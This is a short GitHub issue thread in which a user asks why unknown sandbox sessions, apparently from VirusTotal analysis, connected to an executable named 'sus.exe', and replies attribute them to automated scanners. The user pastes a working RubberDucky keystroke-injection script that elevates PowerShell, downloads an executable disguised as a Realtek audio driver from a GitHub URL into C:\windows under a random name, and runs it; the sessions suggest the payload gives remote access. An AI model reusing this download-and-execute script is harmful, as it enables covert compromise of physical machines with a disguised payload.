Closed david09baz closed 1 year ago
Sounds like an automated scanner, running in a normal sandbox VM.
Scanning for what?
Executables.
OK, thanks, I was wondering. Could this have been caused by submitting it to VirusTotal for sandbox analysis?
Yes.
I built an exe and uploaded it to GitHub just for myself, called "sus.exe". It got 0 views. All of a sudden I'm getting sessions popping up, and they are Russian. I quickly took a screenshot and I got this. It appears to be a VM and the hostname is GlY14zXNwx7W. The IP is 95.25.71.4. This is worrying and I have no idea who could've gotten my exe, and how? I used this RubberDucky script to execute it from the internet; I don't think there are any viruses.
```
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Downloads an .exe file from the URL and runs it on the target pc.
REM Version: 1.0
REM Category: Execution
DELAY 950
WINDOWS d
DELAY 950
WINDOWS r
DELAY 650
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 870
LEFTARROW
ENTER
DELAY 850
ALT y
DELAY 13000
STRING $url = "https://github.com/david09baz/sus/blob/main/Realtek%20HD%20High%20Definition%20Audio.exe?raw=true"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
ENTER
```
I am so confused; I would love a possible answer to this. There is one more session whose hostname is "george", with different locations like Zurich, with an ISP of Packethub.net.